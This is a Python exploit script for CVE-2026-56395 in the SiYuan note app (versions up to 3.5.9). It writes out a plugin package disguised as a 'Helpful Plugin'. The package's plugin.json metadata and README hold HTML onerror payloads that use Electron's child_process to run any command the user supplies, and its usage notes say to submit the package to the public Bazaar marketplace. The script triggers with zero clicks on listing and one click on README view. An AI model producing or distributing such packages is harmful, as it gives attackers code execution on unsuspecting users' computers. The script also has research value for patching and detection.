#!/usr/bin/env python3 # Exploit Title: SiYuan <= 3.5.9 Remote Code Execution via Malicious Bazaar Package # CVE: CVE-2026-56395 # Date: 2026-06-22 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Author Blog : https://banyamersecurity.com/blog/ # Vendor Homepage: https://b3log.org/siyuan/ # Software Link: https://github.com/siyuan-note/siyuan # Affected: SiYuan <= 3.5.9 # Tested on: SiYuan 3.5.x (Windows/macOS) # Category: WebApps # Platform: Electron # Exploit Type: Remote Code Execution # CVSS: 9.6 # Description: SiYuan is vulnerable to RCE via unsanitized Bazaar package metadata (displayName/description) and README.md. Zero-click on Bazaar listing and one-click on README view. # Fixed in: SiYuan 3.6.1+ # Usage: # python3 exploit.py # # Examples: # python3 exploit.py # # Options: # --cmd Custom command to execute (default: calc.exe) # # Notes: # • Generates malicious plugin package ready for Bazaar submission # • Works due to nodeIntegration in Electron # # How to Use # # Step 1: # Run the script to generate the malicious package # # Step 2: # Upload to GitHub and submit to SiYuan Bazaar def banner(): print(r""" ╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗ ║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║ ║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ███████╔╝ ║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╔═╗ Banyamer Security ╔═╗ """) import json import os import base64 from pathlib import Path import sys def create_malicious_package(output_dir="siyuan-poc-plugin", cmd="calc.exe"): base_dir = Path(output_dir) base_dir.mkdir(exist_ok=True) plugin_data = { "name": "poc-helpful-plugin", "displayName": { "default": f"Helpful Plugin <img src=x onerror=\"require('child_process').exec('{cmd}')\">" }, "description": { "default": f"Useful plugin for productivity. <img src=x onerror=\"require('child_process').exec('{cmd}')\">" }, "version": "1.0.0", "author": "poc-researcher", "authorLink": "https://example.com", "readme": "README.md", "icon": "icon.png", "keywords": ["poc", "demo"] } with open(base_dir / "plugin.json", "w", encoding="utf-8") as f: json.dump(plugin_data, f, indent=2, ensure_ascii=False) readme_content = f"""# Helpful Plugin This plugin provides useful features. <img src="x" onerror="require('child_process').exec('{cmd}')"> ## Features - Feature 1 - Feature 2 ## Installation 1. Download 2. Install normally **Proof of Concept for CVE-2026-56395** """ with open(base_dir / "README.md", "w", encoding="utf-8") as f: f.write(readme_content) icon_b64 = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mP8/5+hHgAHggJ/PchI7wAAAABJRU5ErkJggg==" with open(base_dir / "icon.png", "wb") as f: f.write(base64.b64decode(icon_b64)) index_js = """module.exports = { onload() { console.log("Malicious plugin loaded - PoC"); } };""" with open(base_dir / "index.js", "w", encoding="utf-8") as f: f.write(index_js) print(f"[+] Malicious package created in: {base_dir.absolute()}") print("[+] Files: plugin.json (zero-click), README.md (one-click)") print(f"[*] Payload: {cmd}") print("[*] Upload to GitHub → Submit to SiYuan Bazaar") def main(): banner() if len(sys.argv) > 1 and sys.argv[1] == "--help": print("Usage: python3 exploit.py [command]") print("Example: python3 exploit.py \"whoami\"") sys.exit(0) cmd = "calc.exe" if len(sys.argv) > 1: cmd = sys.argv[1] create_malicious_package("siyuan-poc-plugin", cmd) if __name__ == "__main__": main()